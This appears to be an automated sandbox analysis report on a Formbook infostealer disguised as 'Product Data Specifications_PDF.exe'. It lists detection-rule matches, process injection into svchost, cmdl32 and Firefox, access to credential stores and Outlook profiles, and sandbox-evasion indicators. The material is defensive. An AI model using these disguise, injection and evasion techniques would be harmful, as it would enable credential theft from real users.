            Source: Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004763000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Product Data Specifications_PDF.exe
            Source: Product Data Specifications_PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@8/6
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0044AF6C GetLastError,FormatMessageW,6_2_0044AF6C
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,6_2_004333BE
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,6_2_00464EAE
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,6_2_0045D619
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,6_2_004755C4
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,6_2_0046CB5F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,6_2_0043305F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeFile created: C:\Users\user~1\AppData\Local\Temp\nonhazardousnessJump to behavior
            Source: Product Data Specifications_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: cmdl32.exe, 0000000C.00000003.1973204576.0000000003208000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003228000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.00000000031F3000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1973278048.00000000031F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Product Data Specifications_PDF.exeReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeFile read: C:\Users\user\Desktop\Product Data Specifications_PDF.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Product Data Specifications_PDF.exe "C:\Users\user\Desktop\Product Data Specifications_PDF.exe"
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Product Data Specifications_PDF.exe"
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeProcess created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe"
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Product Data Specifications_PDF.exe"Jump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeProcess created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: cmpbk32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: cmutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Product Data Specifications_PDF.exeStatic file information: File size 1335877 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EyHLOQmzGKBL.exe, 0000000B.00000002.3150184532.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158489815.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: cmdl32.pdbGCTL source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cmdl32.pdb source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0040EBD0 LoadLibraryA,GetProcAddress,6_2_0040EBD0
            Source: Product Data Specifications_PDF.exeStatic PE information: real checksum: 0xa961f should be: 0x151e8c
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00416CB5 push ecx; ret 6_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004180C9 push ds; retf 9_2_004180ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00414177 push ds; iretd 9_2_0041417A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00403100 push eax; ret 9_2_00403102
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004181E3 push 00000012h; iretd 9_2_004181B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004181B0 push 00000012h; iretd 9_2_004181B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040828D push ebp; retf 9_2_004082AE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040D2BC push edi; ret 9_2_0040D2BD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0041EB64 push ecx; ret 9_2_0041EB78
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00406B35 push FFFFFFBFh; ret 9_2_00406B37
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004083B5 push edx; ret 9_2_004083D1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040D43C push ds; retf 9_2_0040D43D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00414CFF pushfd ; ret 9_2_00414D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040D5EF push dword ptr [eax]; ret 9_2_0040D5F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00416753 push edi; retf 9_2_0041675E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00416752 push edi; retf 9_2_0041675E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00417FD0 push ds; retf 9_2_004180ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036309AD push ecx; mov dword ptr [esp], ecx9_2_036309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0360135F push eax; iretd 9_2_03601369
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DC27FA pushad ; ret 12_2_04DC27F9
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DC225F pushad ; ret 12_2_04DC27F9
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DC283D push eax; iretd 12_2_04DC2858
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DF09AD push ecx; mov dword ptr [esp], ecx12_2_04DF09B6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BB0A56 push E65B4B16h; iretd 12_2_02BB0A5B
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA4ECF push ds; retf 12_2_02BA4FEA
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA4FC6 push ds; retf 12_2_02BA4FEA
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02B952B2 push edx; ret 12_2_02B952CE
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA50AD push 00000012h; iretd 12_2_02BA50AF
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA50E0 push 00000012h; iretd 12_2_02BA50AF
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA1074 push ds; iretd 12_2_02BA1077
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02B9518A push ebp; retf 12_2_02B951AB
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_0047A330
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00434418
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeAPI/Special instruction interceptor: Address: 4005AF4
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0367096E rdtsc 9_2_0367096E
            Source: C:\Windows\SysWOW64\cmdl32.exeWindow / User API: threadDelayed 2055Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeWindow / User API: threadDelayed 7918Jump to behavior
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-87828
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeAPI coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596Thread sleep count: 2055 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596Thread sleep time: -4110000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596Thread sleep count: 7918 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596Thread sleep time: -15836000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe TID: 7644Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmdl32.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00452492
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00442886
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exeCode function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_004788BD
